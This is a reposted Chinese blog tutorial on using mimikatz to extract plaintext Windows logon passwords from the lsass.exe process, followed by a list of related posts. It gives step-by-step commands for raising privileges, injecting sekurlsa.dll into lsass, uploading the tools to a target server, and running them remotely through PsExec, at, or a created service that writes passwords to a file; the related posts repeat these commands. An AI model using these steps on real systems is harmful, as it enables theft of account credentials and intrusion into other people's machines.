神器mimikatz--windows下抓取密码(转)

最新推荐文章于 2025-07-16 13:48:02 发布
转载 最新推荐文章于 2025-07-16 13:48:02 发布 · 357 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/demonspider/archive/2012/05/25/2517882.html

本文介绍了一个名为mimikatz的轻量级调试工具,由法国开发者制作,主要用于在Windows环境下直接抓取系统中的账户口令。文中详细记录了如何利用mimikatz工具通过不同的方法在本地或远程环境中成功获取lsass进程中的用户明文密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

mimikatz是法国人写的,windows下的轻量级调试器。可以直接抓取windows的口令。只要没有重启,登录过的账户口令都可以抓到。牛mimikatz----windows平台下的神器?

抓取 lsass.exe 中的用户明文密码:

//提升权限 privilege::debug 
//注入dll inject::process lsass.exe sekurlsa.dll 
//抓取密码 @getLogonPasswords


在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

 

//最简单实用的方法,使用 PsExec.exe 启动。 
//在本机启动交互式命令提示窗口 psexec\\127.0.0.1 cmd.exe 
//启动 mimikatz.exe C:\mimikatz_trunk\Win32\mimikatz.exe 
//提升权限 privilege::debug //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)! inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" 
//抓取密码 @getLogonPasswords //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。 exit 
//********************************************************* 
//使用 At 启动 at *** //********************************************************* 
//创建服务方法 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" sc start getpassword sc delete getpassword //********************************************************* 
//telnet 远程命令管道 telnet ****

转载于:https://www.cnblogs.com/demonspider/archive/2012/05/25/2517882.html

mimikatz.exe
01-15
mimikatz.exe
mimikatz2.0抓取WINDOWS密码
angaoux03775的博客
12-26 412
看吾爱的,刚好问同事说这个也用过,以后内网渗透的话比较方便 http://www.52pojie.cn/thread-264895-1-1.html ========================== 2.0版本的只需要两条命令就可以了,比以前版本的更简单了。 第一条:privilege::debug //提升权限第二条:sekurlsa::log...
深入探究MimikatzWindows系统密码抓取工具
weixin_42348783的博客
06-18 1101
Mimikatz是一个广泛使用的安全工具,它能够提取Windows系统中敏感信息,如密码、哈希值和Kerberos票据等。它在安全测试和渗透测试中扮演着重要角色,但同时也可能被滥用导致安全风险。Kerberos是广泛使用的网络认证协议,它通过使用密钥分布中心(KDC)来实现安全的用户和服务之间的认证。Kerberos协议允许用户通过证明自己知道密码的散列(即密钥)来进行认证,而不是明文密码本身,从而提供了双向认证和会话密钥的分发。
mimikatz直接密码.zip
03-23
mimikatz直接密码.zip仅供学习使用,请勿用于非法活动
mimikatz.exe的使用
zz_strive_2012的专栏
06-17 4674
大神们都知道的东西吧,黑客常用工具。法国一个牛B的人写的轻量级调试器, mimikatz最近发布了它的2.0版本,密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)的登陆
Windows密码抓取神器Mimikatz.zip
07-18
轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码!这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器可以提升进程权限 注入进程 读取进程内存等等下面展示一个 读取扫雷游戏的内存的例子我们...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
管理员密码神器--mimikatz
08-01
mimikatz是一款由法国安全研究员Benjamin Delpy开发的强大工具,被誉为“管理员密码神器”。它主要用于提取操作系统中的敏感信息,包括但不限于明文密码、NTLM哈希、 Kerberos票证等。mimikatz以其简单易用和广泛...
密码抓取神器mimikatz
02-02
抓取整个windows系列的密码神器,必须在DOS命令提示符下以管理员身份运行;首先输入命令:privilege::debug 接着输入命令:sekurlsa::logonpasswords ,即可查看到相关信息
GetPass 获取密码
12-21
可以从已经登陆过本机的所有账号密码
mimikatz.exe windows密码查看
07-12
cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称---------结束进程 process::modules --列出系统的核心模块及所在位置 service::list---------------列出系统的服务 service::remove-----------移除系统的服务 service::start stop 服务名称--启动或停止服务 privilege::list---------------列出权限列表 privilege::enable--------激活一个或多个权限 privilege::debug-----------------提升权限------------------ nogpo::cmd------------打开系统的cmd.exe nogpo::regedit -----------打开系统的注册表 nogpo::taskmgr-------------打开任务管理器 ts::sessions-----------------显示当前的会话 ts::processes------显示进程和对应的pid情况等 sekurlsa::wdigest-----获取本地用户信息及密码 sekurlsa::tspkg------获取tspkg用户信息及密码 sekurlsa::logonPasswords--获登陆用户信息及密码----------------
mimikatz2 0 最新 一键
05-04
mimikatz2 0 最新 一键版 源码编译 32位 64位
一文带你玩内网渗透大杀器Mimikatz
最新发布
xx16755498979的博客
07-16 1023
Mimikatz无疑是一把双刃剑。在攻击者手中,它是收割内网的魔器;而在安全人员手中,它是检验系统防御强度、理解攻击手法的神器。掌握它,不是为了作恶,而是为了更好地理解黑暗,从而拥抱光明。希望今天的分享能让你对内网渗透有更深刻的认识。
mimikatz的使用
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
轻量级调试器神器 - mimikatz (学习了,很强大的工具)
我的IT乐园
06-01 1万+
神器mimikatz使用详解 一.mimikatz简介   mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。   mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更
mimikatz使用方法
课嗨教育的专栏
04-23 4017
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
misc经验积累篇—内网渗透神器Mimikatz
m0_67503765的博客
03-14 530
bugku简单的取证
mimikatz-master工具分析:Windows账户密码获取指南
当使用mimikatz获取Windows账户密码时,它通常利用Windows操作系统的各种安全漏洞和缺陷,通过特定的命令获取存储在系统内存中的凭据。在特定情况下,比如管理员权限的进程运行时,系统会以明文形式存储密码或哈希...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值